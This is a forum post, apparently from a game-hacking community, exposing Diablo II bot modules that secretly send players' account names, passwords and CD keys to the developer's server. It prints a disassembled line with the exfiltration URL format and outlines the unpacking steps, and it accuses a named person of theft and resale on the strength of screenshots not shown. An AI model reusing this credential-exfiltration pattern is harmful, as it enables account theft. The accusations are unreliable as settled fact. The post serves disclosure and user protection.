_CM
Respected Member
This post was originally posted at Blizzhackers.com. Netter's programs (such as Meph- and Pindlesweeper) seem to submit your information to some sort of script on netter's server. Here's the whole thread
~coolmission
I strongly advice you all to remove Mephsweeper/Pindlesweeper from your system, change all your passwords to accounts and scan your system for more malicious software.Hellmonkeyz said:Netter (nhnhnh) is the owner of netterhaufen.de and creator of Pindle Sweeper, Meph Sweeper, Chess, and other modules.
Netter acts like a nice guy to most, however, he is hiding a dark secret. His Pindle and Meph Bots are embedded with account and CD-Key stealing devices. Don't believe me? Take a look at this image provided to me by an anonymous user for use in this document:
This is a screen shot of his desktop, looking at a peculiar page at netterhaufen.de. This page is where he views his log of stolen accounts and keys. As you can see, I blocked out the passwords to protect the innocent. The CD-Key's mostly say N/A, however, there are some listed in that log, and I am sorry for whomever got scammed my Netter. I believe it grabs the CD-Key's from the registry, so only if you have used Onlyer's CD-Key Refiller will it be able to steal them. You may have noticed that at his website he started selling accounts as well as CD-Keys. I think you can make the connection of where these are coming from. You can visit the page in the screen shot and see the log, however, it requires a password to view the data, otherwise it is all ***'s. I am not telling anyone the password, so don't ask, and he's probably going to remove that page soon anyways.
Now, in case you are wondering, the PS and MS modules connect to http://www.netterhaufen.de/info/info.php to place the data in a text file which the http://www.netterhaufen.de/info/log.php file reads. If you want, you can disassemble the .d2h modules to see it for yourself.
This is how I found it in the newest MephSweeper module. First I used ASPackDie v1.41 to unpack ms.d2h. Now, you should be able to view the "real" module with a Hex Editor or a Disassembler. I disassembled it with OllyDbg to find the exact location of where the logging is taking place. Here is where I found the formatted string:
The first variable (t=) is the time, the second (c=) is the character name, the third (a=) is the account, the fourth (p=) is the password, the fifth (r=) is the realm, the sixth (k1) is the classic key, the sixth (k2) is the expansion key, the seventh (b=) is the name of the bot (MephSweeper 0.4 in this case), and the last (g=) is the game type (expansion or normal). Then, after it he simply calls that URL with a WININET.InternetOpenURL and the PHP script does the rest. In between this it has some bullshit "checking version" things which are just a cover up. "Please standby, while we check your module version.." and "Great! You are using the most recent version." are just the bullshit messages Netter uses.Code:00AB16A2 |. 68 CC93AB00 PUSH unpacked.00AB93CC ; |format = "http://www.netterhaufen.de/info/info.php?t=%s&c=%s&a=%s&p=%s&r=%s&k1=%s&k2=%s&b=MephSweeper 0.4&g=%s"
Here you can see in OllyDbg where this is at (I removed my start bar from the image). You can see the formatted string highlighted there, and above it is where he sets the time, and above it even further by "d2xcdkey" is where he grabs the key from the registry. Take a look around there if you want.
Now, if this isn't enough proof, I am not sure what is. Go ahead and view it on your own if you want, and other people who have the ability to do this can confirm it.
P.S -- Here is a (better) shot of Netter's desktop and part of a MSN conversation with Abinn, to prove that it is his computer and desktop:
MORE IMAGES
Netter copying a CD-Key from his stolen account // key log to his list of CD-Key's:
Netter copying CD-Key's from his list of keys to an E-Mail that he is sending to someone who bought some keys from his site:
This is me on Netter's log showing the CD-Key that he has sold to someone that Netter claims: "You can buy 100% working, brand-new and safe CD-Keys that work on every Realm! These CD-Keys have never been used before and each key will be sold only once to a customer."
(All these images have passwords and keys blurred out to protect the innocent, which Netter has unfortunently not done.)
- Hellmonkeys
~coolmission
